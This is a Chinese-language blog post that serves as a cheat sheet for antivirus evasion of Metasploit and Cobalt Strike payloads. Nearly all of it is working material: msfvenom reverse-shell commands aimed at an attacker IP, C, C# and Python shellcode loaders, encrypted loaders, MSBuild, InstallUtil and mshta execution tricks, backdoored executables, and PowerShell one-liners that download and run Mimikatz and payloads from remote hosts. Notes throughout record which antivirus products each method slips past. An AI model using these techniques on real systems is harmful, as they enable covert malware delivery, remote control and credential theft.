免杀

MSF shellcode免杀

nps_payload

>python nps_payload.py正常生成
>msfconsole -r msbuild_nps.rc开启监听
>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
正常执行结束进程msbuild会失去会话,以下保存bat执行
获得session后立刻迁移进程
@echo off
echo [*] Please Wait, preparing software ..
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
exit

编码器

>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov 编码进行免杀
>set stageencodingfallback false
&
>msfvenom --list encoders列出编码器

c/c++源码免杀

>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
-i编码20次
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe

指针执行

unsigned char buf[] =
"shellcode";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
main()
{
    ( (void(*)(void))&buf)();
}
使用vc6.0组建编译后在靶机执行

image

当前过不了火绒,360动态静态可过

申请动态内存

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
unsigned char buf[] =
"shellcode";
main()
{
    char *Memory;
    Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    ((void(*)())Memory)();
}

嵌入汇编

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
    __asm
    {
        mov eax, offset shellcode
        jmp eax
    }
}

强制类型转换

#include <windows.h>
#include <stdio.h>
unsigned char buf[] ="";
void main()
{
 ((void(WINAPI*)(void))&buf)();
}

汇编花指令

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
        __asm
    {
        mov eax, offset shellcode
        _emit 0xFF  
        _emit 0xE0
    }
}

XOR加密

https://github.com/Arno0x/ShellcodeWrapper安装
生成raw格式木马
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw

image

加密
> python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
生成的py文件使用py2exe编译执行
生成的cs文件使用csc.exe编译执行
生成的cpp文件使用vc6.0编译,去掉预编译头编译执行

image

远程线程注入

目前过火绒,不过360,可组合一下
Vs新建c++控制台程序
右键属性-》将MFC的使用选为在静态库中使用MFC
生成c格式shellcode粘贴进remote inject.cpp

image

生成项目
能成功上线,并开启calc进程

image image

加载器免杀

shellcode_launcher

https://github.com/clinicallyinane/shellcode_launcher/
生成payload(raw)
>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
加载器加载
>shellcode_launcher.exe -i shellcode.raw

SSI加载

https://github.com/DimopoulosElias/SimpleShellcodeInjector
生成payload(c)
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
执行
>cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

image

MSF监听
可使用minGW自行编译
>gcc SimpleShellcodeInjector.c -o xxx.exe
执行
>xxx.exe +生成的编码

c#源码免杀

直接编译

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
MSF启动监听
Payload粘贴到位置
    using System;
    using System.Runtime.InteropServices;
    namespace TCPMeterpreterProcess
    {
        class Program
        {
            static void Main(string[] args)
            {
                byte[] shellcode = new byte[] {payload here};
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                IntPtr hThread = IntPtr.Zero;
                UInt32 threadId = 0;
                // prepare data
                IntPtr pinfo = IntPtr.Zero;
                // execute native code
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
            [DllImport("kernel32")]
            private static extern bool VirtualFree(IntPtr lpAddress,
            UInt32 dwSize, UInt32 dwFreeType);
            [DllImport("kernel32")]
            private static extern IntPtr CreateThread(
                UInt32 lpThreadAttributes,
                UInt32 dwStackSize,
                UInt32 lpStartAddress,
                IntPtr param,
                UInt32 dwCreationFlags,
                ref UInt32 lpThreadId
            );
            [DllImport("kernel32")]
            private static extern bool CloseHandle(IntPtr handle);
            [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(
                IntPtr hHandle,
                UInt32 dwMilliseconds
            );
            [DllImport("kernel32")]
            private static extern IntPtr GetModuleHandle(
                string moduleName
            );
            [DllImport("kernel32")]
            private static extern UInt32 GetProcAddress(
                IntPtr hModule,
                string procName
            );
            [DllImport("kernel32")]
            private static extern UInt32 LoadLibrary(
                string lpFileName
            );
            [DllImport("kernel32")]
            private static extern UInt32 GetLastError();
        }
    }
Visual studio创建C#.net framework控制台程序编译可过杀软

加密处理

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
粘贴payload后编译加密
    using System;
    using System.Collections.Generic;
    using System.IO;
    using System.Linq;
    using System.Security.Cryptography;
    using System.Text;
    using System.Threading.Tasks;
    using System.Reflection;
    using System.Runtime.CompilerServices;
    using System.Runtime.InteropServices;
    namespace Payload_Encrypt_Maker
    {
        class Program
        {
            // 加密密钥,可以更改,加解密源码中保持KEY一致就行
            static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
            static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
            static byte[] payload = { payload here };    // 替换成MSF生成的shellcode
            private static class Encryption_Class
            {
                public static string Encrypt(string key, string data)
                {
                    Encoding unicode = Encoding.Unicode;
                    return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
                }
                public static byte[] Encrypt(byte[] key, byte[] data)
                {
                    return EncryptOutput(key, data).ToArray();
                }
                private static byte[] EncryptInitalize(byte[] key)
                {
                    byte[] s = Enumerable.Range(0, 256)
                    .Select(i => (byte)i)
                    .ToArray();
                    for (int i = 0, j = 0; i < 256; i++)
                    {
                        j = (j + key[i % key.Length] + s[i]) & 255;
                        Swap(s, i, j);
                    }
                    return s;
                }
                private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
                {
                    byte[] s = EncryptInitalize(key);
                    int i = 0;
                    int j = 0;
                    return data.Select((b) =>
                    {
                        i = (i + 1) & 255;
                        j = (j + s[i]) & 255;
                        Swap(s, i, j);
                        return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                    });
                }
                private static void Swap(byte[] s, int i, int j)
                {
                    byte c = s[i];
                    s[i] = s[j];
                    s[j] = c;
                }
            }
            static void Main(string[] args)
            {
                byte[] result = Encryption_Class.Encrypt(KEY, payload);
                int b = 0;
                for (int i = 0; i < result.Length; i++)
                {
                    b++;
                    if (i == result.Length + 1)
                    { Console.Write(result[i].ToString()); }
                    if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
                }
            }
        }
    }

image

编译解密
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;
    using System.Runtime.InteropServices;
    using System.Threading;
    using System.Reflection;
    using System.Runtime.CompilerServices;

    namespace NativePayload_Reverse_tcp
    {
        public class Program
    {
            public static void Main()
            {
                Shellcode.Exec();
      }
    }
    class Shellcode
    {
      public static void Exec()
      {
        string Payload_Encrypted;
        Payload_Encrypted = "payload here";
        string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
        byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
        for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
        {
          byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
          _X_to_Bytes[i] = current;
        }
        // 解密密钥,可以更改,加解密源码中保持KEY一致就行
                byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
                byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
                // 加载shellcode
                IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
                Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
                CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
                Thread.Sleep(2000);
            }
            public static byte[] Decrypt(byte[] key, byte[] data)
            {
                return EncryptOutput(key, data).ToArray();
            }
            private static byte[] EncryptInitalize(byte[] key)
            {
                byte[] s = Enumerable.Range(0, 256)
                .Select(i => (byte)i)
                .ToArray();
                for (int i = 0, j = 0; i < 256; i++)
                {
                    j = (j + key[i % key.Length] + s[i]) & 255;
                    Swap(s, i, j);
                }
                return s;
            }
            private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
            {
                byte[] s = EncryptInitalize(key);
                int i = 0;
                int j = 0;
                return data.Select((b) =>
                {
                    i = (i + 1) & 255;
                    j = (j + s[i]) & 255;
                    Swap(s, i, j);
                    return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                    });
            }
            private static void Swap(byte[] s, int i, int j)
            {
                byte c = s[i];
                s[i] = s[j];
                s[j] = c;
            }
            [DllImport("kernel32.dll")]
            public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
            [DllImport("kernel32.dll")]
            public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        }
    }

XOR/AES编码

与上文xor加密类似

CSC+InstallUtil

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译

image

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs

image

执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

Python源码免杀

pyinstaller加载C代码编译

生成C格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe
>python pyinstaller-script.py -F -w shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载py代码编译(*)

生成py格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe
>python pyinstaller-script.py --console --onefile shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

image image image

Py2exe打包exe

生成raw格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
在32位系统上安装python、py2exe
创建setup.py放置同一目录

image

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
执行打包命令
>python setup.py py2exe
会在当前目录生成dist文件夹,打包好的exe在里面

image

Base64编码+Pyinstaller打包

MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Shellcode粘贴在shellcode+base64+c.py中
>python pyinstaller-script.py -F -w shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

加载器分离

hex

生成c格式payload
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

使用
https://github.com/k8gege/scrun

image

或
>python scrun.py xxx
或
编译ScRunHex.py为exe

Base64(*)

生成c格式payload
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

进行hex编码后,粘贴进去base64编码

image

看系统位数编译ScRunBase.py文件,使用pyinstaller打包为exe后执行
https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

image image

DLL劫持

白dll劫持
Processmonitor查找程序加载的dll
使用stud_pe加载dll进去
或
生成payload免杀好粘贴进去,查看目标上有什么软件,本地查找可劫持的dll,劫持好文件后传上去。

image

MSBuild

链接
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
远程执行
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
要设置自动迁移进程

image

GreatSCT

>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Mshta

https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
生成
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
>cat 1.bin |base64 -w 0

image

编码后的内容复制到

image

执行
>mshta http://192.168.0.106:1222/1.hta
360执行检测出来,静态动态无法检测、火绒无法检测

InstallUtil

内网文章中有介绍

Veil

>use 1选择evasion模块
>list查看可用payload
>use 7 选择c格式的payload
>set LHOST/LPORT设置回连IP和端口
>generate生成

image

直接生成的exe可能会被查杀,目前可过360,不能过火绒
使用minGW-w64编译C文件
>gcc -o vel.exe veil.c -l ws2_32

RC4

>msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

捆绑

>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe  -i 15 -f exe -o /var/www/html/payload4.exe

Evasion模块

>show evasion

Phantom-Evasion

image image

Shellter

仅支持32位程序
>apt install shellter
指定一个exe文件

image

选择payload

the-backdoor-factory

查看是否支持捆绑
>python backdoor.py -f /root/Desktop/putty.exe -S
查看此文件支持哪些payload
>python backdoor.py -f /root/Desktop/putty.exe -s show
reverse_shell_tcp_inline对应msf
set payload windows/meterpreter/reverse_tcp
meterpreter_reverse_https_threaded应msf
set payload windows/meterpreter/reverse_https
iat_reverse_tcp_stager_threaded修复IAT
user_supplied_shellcode_threaded自定义payload
参数
-s 指定payload
-H 回连地址
-P 回连端口
-J 多代码裂缝注入
>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
后门生成在backdoored目录
或
生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
自定义
>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

zirikatu

image

hanzoInjection

https://github.com/P0cL4bs/hanzoInjection
生成
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
>HanzoInjection.exe -p 1.bin -o 1.cs
编译1.cs
属性-生成-允许不安全代码

PowerShell免杀

直接生成

>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
执行
>powershell -ep bypass -noexit -file 1.ps1
Powershell行为检测bypass
>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

Invoke-Shellcode加载

生成code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
目标执行
> powershell -ep bypass
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
> Invoke-Shellcode -Shellcode ($buf) -Force

image image

防护软件没反应

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation
生成code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
>powershell -ep bypass
>Import-Module .\Invoke-Obfuscation.psd1
>Invoke-Obfuscation
>set scriptpath C:\Users\y\Desktop\1.ps1
>encoding
>3 指定编码方式
>out C:\Users\y\Desktop\ok.ps1 保存

image image

执行
>powershell -ep bypass -noexit -file ok.ps1

image image image

Xencrypt

https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100 递归分层躲避动态查杀

image

>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

image image

PyFuscation

https://github.com/CBHue/PyFuscation
对函数,参数,变量进行混淆
>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

image image

拆分+C编译

#include<stdio.h>
#include<stdlib.h>
int main(){
system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
return 0;
}

行为检测

>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Out-EncryptedScript

http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

image image

PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
PS > [String] $cmd = Get-Content .\evil.ps1
PS > Invoke-Expression $cmd
PS > $decrypted = de shabiisme 123456
PS > Invoke-Expression $decrypted
PS > Invoke-Mimikatz

cobalt strike powershell免杀

From: https://y4er.com/post/cobalt-strike-powershell-bypass/
powershell>$string = ''
powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[cs生成的shellcode]')
powershell>$s |foreach { $string = $string + $_.ToString()+','}
powershell>$string>c:\1.txt
修改ps脚本
[Byte[]]$var_code = [Byte[]](payload)
再混淆一下函数和变量
绕过执行命令的拦截
使用cs的参数欺骗
beacon > argue cmd.exe blablabla

分块免杀

生成
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1

image

先来测试一下,把ps1文件的shellcode换成一段无害的字符串

image image

结果发现还是被查杀了

image

这表明大多数检测来自PowerShell模板,而不是Shellcode本身。
下面几种bypass方法
1.将字符串分成几部分并创建中间变量;
2.添加大量垃圾备注;
3.添加一些垃圾指令,例如循环或睡眠指令(对于沙盒有用)。
[DllImport("kernel32.dll")]
变为
[DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克
$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
变为
$magic="Syst"+"em"+".dll";
$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
分割shellcode
$sc0=<shellcode的第1部分>; …$sc7=<shellcode的第8部分>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
一些细节可参照
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
我不太懂汇编语言,所以没有添加无害指令。
这里直接使用一键生成的bash脚本,有时间的可以读读里面的命令
https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
这个脚本是生成个hta的,脚本以1337个字符来分块

image

我测试的时候1337个字符会被赛门铁克查杀到,我这里修改成250个字符来分块

image

因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等

image

执行完后会生成一些文件

image

我们只用final_pshnet_revhttps.ps1这个文件,打开修改一下

image

修改成

image image image

Ruby

目标机器装有ruby时
生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
粘贴到ruby中

image

执行
>ruby xx.ruby

Golang

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
代码转换成0x格式,粘贴到go.txt中保存为go格式

image

安装golang环境在shellcode目录执行
>go build生成exe

加载器

go-shellcode

https://github.com/brimstone/go-shellcode
进入cmd/sc目录编译sc.exe
>go build

image

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 
加载器加载shellcode
>sc.exe shellcode

image

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
>gsl -s SHELLCODE -hex msf生成hex格式
>gsl -f shell.raw本地加载raw格式文件
>gsl -f shell.hex -hex 本地加载hex格式文件
>gsl -u http://192.168.0.108/1.raw 远程加载
>gsl -u http://192.168.0.108/1.hex
posted @ 2022-12-04 16:03  kalibb  阅读(239)  评论(0编辑  收藏  举报